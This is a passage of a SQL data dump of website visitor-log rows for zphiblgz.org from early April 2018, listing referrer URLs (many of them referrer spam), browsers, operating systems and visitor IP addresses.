,'000',1,0),(28114,'2018-04-03','http://site.ru','Chrome','Windows','5.0.375.99','','88.198.157.152','000',2,0),(28115,'2018-04-03','http://site.ru','Chrome','Windows','5.0.375.99','','159.203.76.114','000',1,0),(28116,'2018-04-03','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.28','000',1,0),(28117,'2018-04-03','https://zphiblgz.org','Safari','Macintosh','11.0.3','','96.235.147.67','000',1,0),(28118,'2018-04-03','https://www.google.com/','Safari','iPhone','11.0','','71.166.46.17','000',2,0),(28119,'2018-04-03','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.177.211','000',1,0),(28120,'2018-04-03','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.28','000',1,0),(28121,'2018-04-03','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.28','000',1,0),(28122,'2018-04-03','https://docsarchive.net/','MSIE','Unknown','6.0','','134.249.55.53','000',2,0),(28123,'2018-04-03','https://www.google.com/','Chrome','Macintosh','65.0.3325.162','','73.104.49.44','000',2,0),(28124,'2018-04-03','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',2,0),(28125,'2018-04-03','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.32','000',1,0),(28126,'2018-04-03','https://zphiblgz.org/','Firefox','Windows','39.1','','62.122.88.181','000',2,0),(28127,'2018-04-03','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','159.65.31.221','000',2,0),(28128,'2018-04-03','http://site.ru','Chrome','Windows','5.0.375.99','','67.212.240.177','000',2,0),(28129,'2018-04-03','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.27','000',1,0),(28130,'2018-04-03','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.27','000',1,0),(28131,'2018-04-03','https://zphiblgz.org','Safari','iPhone','11.0','','68.134.7.126','000',2,0),(28132,'2018-04-03','http://transit.in.ua/','MSIE','Windows','6.0','','46.119.121.22','000',3,0),(28133,'2018-04-03','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.189','000',1,0),(28134,'2018-04-04','http://site.ru','Chrome','Windows','5.0.375.99','','178.33.169.214','000',3,0),(28135,'2018-04-04','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(28136,'2018-04-04','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.27','000',1,0),(28137,'2018-04-04','https://zphiblgz.org/','Chrome','Windows','62.0.3202.62','','62.122.88.181','000',2,0),(28138,'2018-04-04','https://zphiblgz.org/','Firefox','Windows','57.0','','62.122.88.181','000',2,0),(28139,'2018-04-04','http://zphiblgz.org/','Opera','Windows','12.16','','195.22.125.122','000',3,0),(28140,'2018-04-04','https://www.google.com/','Firefox','Windows','59.0','','100.36.90.41','000',4,0),(28141,'2018-04-04','http://healbio.ru/','MSIE','Windows','6.0','','178.137.86.152','000',1,0),(28142,'2018-04-04','https://zphiblgz.org','Firefox','Windows','40.1','','71.192.20.127','000',2,0),(28143,'2018-04-04','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.27','000',1,0),(28144,'2018-04-04','https://zphiblgz.org','python-requests','Unknown','2.18.1','','86.53.250.54','000',1,0),(28145,'2018-04-04','https://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','103.255.254.135','000',1,0),(28146,'2018-04-04','http://svetka.info/','MSIE','Unknown','7.0b','','46.118.127.172','000',3,0),(28147,'2018-04-04','https://zphiblgz.org/','Firefox','Windows','30.0','','46.161.9.18','000',3,0),(28148,'2018-04-04','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1747.6tvnNPLCXUfs5lKSAauTxB-zJadXBElXGmj7waHex7w.d4538e3f6c0134385e9eb23e67fefbfd78e5da2d&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041c3BDYko1TEtrS0lNaS1XT1V0dXFMM2g3a1VOR1lMZmtmallMTzZEbTZEUSws&sign=92d96e6eec1839abf5b11a43ba72f0f6&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.12.138','000',2,0),(28149,'2018-04-04','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.165.74','000',2,0),(28150,'2018-04-04','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.94','','52.165.148.51','000',1,0),(28151,'2018-04-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','167.114.209.38','000',17,0),(28152,'2018-04-04','https://zphiblgz.org','Chrome','Android','45.0.2454.94','','167.114.209.38','000',1,0),(28153,'2018-04-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','150.95.149.216','000',2,0),(28154,'2018-04-04','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1747.TOTC_QtlHSeuXzucDf15PfbxlBpEgA8soB0cJwHUB08.56d8300ff52a2cc32d3624c6cd6fb042a088fadc&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040eE1sV3piYWMyZG15UzZMenExUE1raVlSd2t4NFo0eC1MakpLcWw3S29BZyws&sign=0b7f3e42f96b744af3941be4ee3c7f3e&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.125.238','000',2,0),(28155,'2018-04-04','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','46.118.155.165','000',1,0),(28156,'2018-04-04','https://www.google.com/','Safari','iPhone','11.0','','50.225.39.88','000',2,0),(28157,'2018-04-04','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1747.MJ-Ays4WcGviysJzk6WkOzt8J1KOq1dFHfn88MmyrkU.42afb3661269f97018c175864a907f54bb7feb8d&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041d3Z6aHlyN0h1eldDbnJITndndDZnMGRUX3FDTW9mcTFUZ0VaamJNZm94dyws&sign=6152910f0ee3ab8610dc06685f163e74&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','103.102.44.204','000',2,0),(28158,'2018-04-04','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.32','000',1,0),(28159,'2018-04-04','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.30','000',1,0),(28160,'2018-04-04','https://zphiblgz.org','Safari','iPhone','11.0','','174.205.1.209','000',3,0),(28161,'2018-04-04','https://zphiblgz.org','Safari','iPhone','11.0','','50.225.39.86','000',5,0),(28162,'2018-04-04','http://zphiblgz.org/scholarship/','Safari','iPhone','11.0','','107.77.203.140','000',1,0),(28163,'2018-04-04','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1747.lw54G2ehqAl8SJO1QyhEhnoSoIP_SdPT3ZkrPVaQxiQ.e38b71170981bc8b344190ebd9cfe2daa09ea677&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040ZVZoVFBaUFRUVGhoY181anJ2TE9KM3laN3hOdDBSSGdiVEx3YW9QWWhjdyws&sign=64092b5b3ff11861756f6fb026ddc401&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.65.17.193','000',2,0),(28164,'2018-04-04','https://www.google.com/','Chrome','Windows','65.0.3325.181','','73.129.22.251','000',2,0),(28165,'2018-04-04','http://site.ru','Chrome','Windows','5.0.375.99','','94.102.212.124','000',1,0),(28166,'2018-04-04','https://www.google.com/','Safari','iPhone','11.0','','100.36.70.97','000',4,0),(28167,'2018-04-04','https://zphiblgz.org','Safari','iPhone','7.0','','131.253.25.185','000',1,0),(28168,'2018-04-04','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','104.131.19.168','000',2,0),(28169,'2018-04-04','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.29','000',1,0),(28170,'2018-04-04','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.29','000',1,0),(28171,'2018-04-04','https://www.google.com/','Chrome','Windows','65.0.3325.181','','208.159.100.21','000',3,0),(28172,'2018-04-04','https://www.google.co.jp/','Edge','Windows','14.14393','','122.211.39.65','000',2,0),(28173,'2018-04-04','https://zphiblgz.org','MSIE','Windows','8.0','','52.27.2.86','000',1,0),(28174,'2018-04-04','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.32','000',1,0),(28175,'2018-04-04','http://zahvat.ru/','MSIE','Windows','6.0','','46.119.121.22','000',3,0),(28176,'2018-04-04','https://www.google.com/','Chrome','Macintosh','65.0.3325.181','','216.2.107.138','000',3,0),(28177,'2018-04-04','https://zphiblgz.org','Safari','Macintosh','11.0.3','','73.212.64.200','000',3,0),(28178,'2018-04-04','https://jobius.com.ua/','MSIE','Windows','6.0','','46.118.127.172','000',1,0),(28179,'2018-04-04','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(28180,'2018-04-04','https://mikozstop.com/','MSIE','Windows','6.0','','134.249.55.53','000',1,0),(28181,'2018-04-04','https://zphiblgz.org/','Chrome','Windows','63.0.3239.84','','31.130.1.226','000',2,0),(28182,'2018-04-04','https://picturesmania.com/','MSIE','Unknown','6.0','','178.137.86.152','000',2,0),(28183,'2018-04-04','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.31','000',1,0),(28184,'2018-04-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.34.228','000',1,0),(28185,'2018-04-04','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','196.64.248.230','000',2,0),(28186,'2018-04-04','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.29','000',1,0),(28187,'2018-04-04','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(28188,'2018-04-04','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',2,0),(28189,'2018-04-04','https://zphiblgz.org','Safari','Macintosh','11.0.3','','96.244.229.165','000',1,0),(28190,'2018-04-04','https://professionalsolutions.eu/ru/','Opera','Windows','6.0','','178.137.86.152','000',1,0),(28191,'2018-04-04','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','68.134.6.95','000',1,0),(28192,'2018-04-04','https://zphiblgz.org/scholarship/recommendation/','Safari','iPhone','11.0','','71.244.128.30','000',5,0),(28193,'2018-04-04','https://zphiblgz.org','Chrome','Windows','45.0.2462.77','','104.168.93.125','000',2,0),(28194,'2018-04-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','150.95.212.116','000',2,0),(28195,'2018-04-04','https://zphiblgz.org','Chrome','iPhone','65.0.3325.152','','73.163.12.131','000',1,0),(28196,'2018-04-04','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.28','000',1,0),(28197,'2018-04-04','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.62.110.204','000',3,0),(28198,'2018-04-04','http://pk-services.ru/','MSIE','Windows','4.01','','46.119.121.22','000',2,0),(28199,'2018-04-05','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(28200,'2018-04-05','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(28201,'2018-04-05','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.27','000',1,0),(28202,'2018-04-05','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.27','000',1,0),(28203,'2018-04-05','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.27','000',1,0),(28204,'2018-04-05','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.27','000',1,0),(28205,'2018-04-05','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',2,0),(28206,'2018-04-05','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.32','000',1,0),(28207,'2018-04-05','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(28208,'2018-04-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','129.78.110.124','000',2,0),(28209,'2018-04-05','https://zphiblgz.org/membership/','AppleWebKit','Windows','534','','40.77.177.152','000',1,0),(28210,'2018-04-05','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.178.253','000',1,0),(28211,'2018-04-05','http://site.ru','Chrome','Windows','5.0.375.99','','148.251.10.141','000',2,0),(28212,'2018-04-05','https://zphiblgz.org','Chrome','Windows','60.0.3112.113','','212.83.178.172','000',1,0),(28213,'2018-04-05','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','94.23.31.164','000',2,0),(28214,'2018-04-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','104.196.211.79','000',4,0),(28215,'2018-04-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.231.222.104','000',4,0),(28216,'2018-04-05','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.32','000',1,0),(28217,'2018-04-05','https://zphiblgz.org','Firefox','Windows','40.1','','49.144.207.1','000',2,0),(28218,'2018-04-05','http://site.ru','Chrome','Windows','5.0.375.99','','184.168.200.161','000',3,0),(28219,'2018-04-05','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1748.inOBNCVHskUgzinWZaP1xNRg95QuDK-khzTyneN_ysw.49c7d007343254d4c24bbcf7b6763c16af6b54ee&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043VlFvbExPT0IzbDNFZm9yLU1oYVp1TkRmaER6U0Ftc2NlRGFwU3otZTZyUSws&sign=d435e07a0119705ff71f99c1203b3a8a&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.219.21','000',2,0),(28220,'2018-04-05','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1748.siE1lp8WZ2xvLdVIO8Lu4mj7p-_2wFw2bC2Jw8-0XGc.7e32118185137d37bd0476300bb84e09dc23d90f&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043Nl9lVTdiRWNKV2xyZ1lDWkI4eWJCRHJZTVVMX3hNMUhJajFibVJnMFZaZyws&sign=531c53d266081824c0d4ba7943392c49&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','13.57.220.147','000',2,0),(28221,'2018-04-05','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.167','','50.225.39.82','000',5,0),(28222,'2018-04-05','https://www.google.com/','Chrome','Windows','65.0.3325.162','','162.99.237.31','000',3,0),(28223,'2018-04-05','https://zphiblgz.org','Firefox','Windows','40.1','','78.169.132.189','000',2,0),(28224,'2018-04-05','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.30','000',1,0),(28225,'2018-04-05','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.30','000',1,0),(28226,'2018-04-05','https://zphiblgz.org','MSIE','Windows','11.0','','161.69.99.11','000',4,0),(28227,'2018-04-05','http://elementspluss.ru/','Opera','Windows','6.0','','46.118.127.172','000',1,0),(28228,'2018-04-05','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1748.LuHhMya-kZYBsEuR-CsFfQeDa41A6ygSWRuf0pOvJp4.43451941c2286194c990e7576f811be55a0b28dd&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042WFNfeWgtTUl5R0JzNTFUUDYyc3Eyc09OdU9IZi1VaTBVVDE3WlBnaXlnZyws&sign=538549510a6ddc268697f82e6ccbb0f2&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','178.62.82.124','000',2,0),(28229,'2018-04-05','http://site.ru','Chrome','Windows','5.0.375.99','','81.88.49.26','000',1,0),(28230,'2018-04-05','http://site.ru','Chrome','Windows','5.0.375.99','','81.88.49.39','000',1,0),(28231,'2018-04-05','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1748.ET4Gy1SNxR1Os3eCGnaFTEdZKx3jXJgsZM5KA2yWF2k.7a8b2d554bb5e74d1ebfcef6ef588d03fbc3cf7f&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040Z2FaLTRHaWlYWFlaYWgxTWZkdC1EcTVTOFRnalFkaFgzcjM4LWZJNFRIdyws&sign=28309f037c6a0b1cb7de7f4066667400&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.197.155.237','000',2,0),(28232,'2018-04-05','https://studentguide.ru/','MSIE','Windows','6.0','','178.159.37.55','000',3,0),(28233,'2018-04-05','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1748.7KSY82Hm3Ri6JpZW4dnut4z50RlcX1iZrb6wDMqOXsc.9c8dbafa16ac16693b3c1dea222abecff2d4aecf&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042RkJWUkdtR2dkV2JSMDJRcUdmZW5UMjFIaEVlLUo2cUlMRXpIbXVha1J5QSws&sign=9edd3ac248fe65ae54f495680ef0e5b0&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.68.94.227','000',2,0),(28234,'2018-04-05','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.32','000',1,0),(28235,'2018-04-05','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1748.WT3_Jg4uHM-pAlSX3bm9UNWwh-zh4YSHmHyS21Pyo-k.a5db10b9b142ea9309b9c11f50db76acec26efda&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042cl9fSHZpbUJDUWRjUVp0QThSbDdGU0hyTmNtOXNEZ280R2NwQmpuYU1KUSws&sign=fb36bd55cbbe8cee8471439ae9e3d27e&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','146.185.183.235','000',2,0),(28236,'2018-04-05','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.29','000',1,0),(28237,'2018-04-05','https://zphiblgz.org','Firefox','Windows','40.1','','24.67.26.183','000',2,0),(28238,'2018-04-05','http://komp-pomosch.ru/','MSIE','Windows','6.0','','46.118.127.172','000',1,0),(28239,'2018-04-05','https://zphiblgz.org','Safari','Macintosh','11.0.3','','71.179.81.192','000',4,0),(28240,'2018-04-05','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(28241,'2018-04-05','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.32','000',2,0),(28242,'2018-04-05','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.12','000',1,0),(28243,'2018-04-05','http://site.ru','Chrome','Windows','5.0.375.99','','195.34.83.83','000',4,0),(28244,'2018-04-05','http://site.ru','Chrome','Windows','5.0.375.99','','5.61.248.2','000',3,0),(28245,'2018-04-05','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',1,0),(28246,'2018-04-05','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.29','000',1,0),(28247,'2018-04-05','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(28248,'2018-04-05','https://zphiblgz.org','Firefox','Windows','54.0','','50.225.39.75','000',4,0),(28249,'2018-04-05','https://zphiblgz.org','Safari','Macintosh','11.0.3','','73.212.64.200','000',2,0),(28250,'2018-04-05','http://www.columb.net.ua/','MSIE','Windows','6.0','','46.119.121.22','000',4,0),(28251,'2018-04-05','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.4','000',1,0),(28252,'2018-04-05','https://www.google.com.tr/','Chrome','Android','65.0.3325.109','','176.55.114.24','000',3,0),(28253,'2018-04-05','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.28','000',1,0),(28254,'2018-04-05','http://site.ru','Chrome','Windows','5.0.375.99','','81.88.49.28','000',1,0),(28255,'2018-04-05','http://site.ru','Chrome','Windows','5.0.375.99','','81.88.49.42','000',1,0),(28256,'2018-04-05','http://site.ru','Chrome','Windows','5.0.375.99','','182.156.84.30','000',2,0),(28257,'2018-04-05','https://www.google.com/','Firefox','Windows','59.0','','140.158.41.135','000',3,0),(28258,'2018-04-05','http://zphiblgz.org/wp-content/uploader.php','Chrome','Windows','42.0.2311.152','','195.154.172.76','000',1,0),(28259,'2018-04-05','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1749.XzRoMrfBS2aZpNhxQdqzXkgDdagb7qGsu2i4rXLUv5O8UVTwNjIMXjOTXxi10hu_.0e239f02cb3a8c627b783e0ae1760ebfcd3566d3&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YMkOSpatjLUqgxH-XWLwn-g&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWRZV3NFNHRmNnExb3UyMXhSdTBLVXZiU2tYRDJ5S044WWxfbzI4OFhrTTkwQkdPS3pzVFV2X0NldFRyTzNCVm5vNFFhb1FKbExrNnFwTXdiTHR0cFk&b64e=2&sign=4032d16088e50051cfd128f0cc63e9a6&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQSaYtyyri96FXGqxc7x3_gbns1ND3blCc6egi0SGvxJjRYLz3VS_KrI3hIlhaMmZMqzvTXm7WynpwoJrg0jL9_MOhLOe0jXSCtktsUqms03SmT7Hcij3qp831dU3dx8wcZHTwZ8xIhJX&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXdCnh-_wii4Tim1L2jQ0J0ni6-CLiAQy4foDYZeT9pCbY_oaXe_bVxMYEDYREqlXKTbpL5GLwAOZpKfomVnSAv&l10n=ru&cts=1522969786884&mc=2.89683346535','Firefox','Windows','59.0','','37.144.41.228','000',3,0),(28260,'2018-04-05','http://www.zphibmaryland.org/chapters/','Safari','iPad','11.0','','99.203.16.87','000',6,0),(28261,'2018-04-05','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','146.185.223.240','000',1,0),(28262,'2018-04-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','104.199.88.124','000',4,0),(28263,'2018-04-05','http://incitystroy.ru/','Opera','Windows','8.00','','46.118.127.172','000',3,0),(28264,'2018-04-05','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1749.HLBXcTFyZhZKBJcCjsPhtUYLZVdNd33aFnEcjKAtoOCKNqWxQ7rYvHD0x1OCxEuM.262e737fed23ab5dbf279f31015ac7b81223d9db&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGv9iZwKiy-E54GYiollMFA&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlScUpyYXUwQXliQmpUMlFSODVWdmN3OUsyUENoUXFlT2YxSmxUUENnQ2NrLUtjN3IwcEMtZU5LS3lDUXRVNGhOVy1XS3ptMUZqVzVGNllEdEdYQ1c1M1o4RmtIZ095VGVn&b64e=2&sign=4f4fd814655363fb7ad5f629b38f862f&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQaYgAYq7JarrjbfyEK72qkDicYNI1SgQ21RIPwj07vzFERuJeGQtZidutWLloLjlkhHc83BzBMW9OUbOE14W6j5RUNnTUIryxgHEoOo4n5h5xh_Do9xP7AjnQCB8GpYAKg&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCUano4BEc9IEV8PTBAHKhVdrQPXHj6XwO77lLtEro14qDfIvj0lxtg7y9Ji25KbixlU9MdXo2WW8w&l10n=ru&cts=1522976137526&mc=5.03450348352','Chrome','Windows','64.0.3282.186','','217.114.229.65','000',2,0),(28265,'2018-04-05','http://autoblog.org.ua/','MSIE','Windows','5.5','','178.159.37.55','000',3,0),(28266,'2018-04-05','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.28','000',1,0),(28267,'2018-04-05','http://uralsk.xkaz.org/','MSIE','Windows','6.0','','178.137.86.152','000',1,0),(28268,'2018-04-05','http://site.ru','Chrome','Windows','5.0.375.99','','81.88.49.57','000',1,0),(28269,'2018-04-05','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.35','000',1,0),(28270,'2018-04-05','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','35.177.42.19','000',2,0),(28271,'2018-04-06','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(28272,'2018-04-06','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(28273,'2018-04-06','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.177.158','000',1,0),(28274,'2018-04-06','http://fartunabest.ru/','MSIE','Unknown','6.0','','5.248.253.101','000',3,0),(28275,'2018-04-06','http://site.ru','Chrome','Windows','5.0.375.99','','212.109.218.204','000',1,0),(28276,'2018-04-06','https://unlimitdocs.net/','Unknown','Unknown','Unknown','','134.249.55.53','000',1,0),(28277,'2018-04-06','https://zphiblgz.org','AppleWebKit','Macintosh','603.3.8','','35.167.11.203','000',2,0),(28278,'2018-04-06','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.27','000',1,0),(28279,'2018-04-06','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(28280,'2018-04-06','https://infodocsportal.com/','MSIE','Windows','4.01','','134.249.55.53','000',3,0),(28281,'2018-04-06','https://docsportal.net/','MSIE','Windows','3.02','','134.249.55.53','000',1,0),(28282,'2018-04-06','https://zphiblgz.org','Chrome','Windows','38.0.2125.104','','146.185.223.249','000',13,0),(28283,'2018-04-06','https://zphiblgz.org','Test','Unknown','Unknown','','162.203.33.216','000',1,0),(28284,'2018-04-06','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(28285,'2018-04-06','https://zphiblgz.org/','Firefox','Windows','57.0','','62.122.88.181','000',2,0),(28286,'2018-04-06','http://www.tsatu.edu.ua/','MSIE','Windows','5.5','','46.118.127.172','000',3,0),(28287,'2018-04-06','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1749.icftCLUB9ue-U7UfGSmNDZCzEvxSiwzH8-rYztJsiIA.32bd2be5a6dbee650a90db2eb0be0c680ef92991&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042ZXJOUUxCNDluRW9fRkh0Y3UzbEFWTWx4MHJLSFJJM2ZjS2dPclZ6ZjduZyws&sign=03c64859021bb8d3c6138907e0645234&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.203.16.245','000',2,0),(28288,'2018-04-06','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.31','000',1,0),(28289,'2018-04-06','http://12u.info/','MSIE','Windows','6.0','','178.159.37.55','000',3,0),(28290,'2018-04-06','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.67.59.131','000',2,0),(28291,'2018-04-06','https://laminat.com.ua/','MSIE','Windows','6.0','','178.137.86.15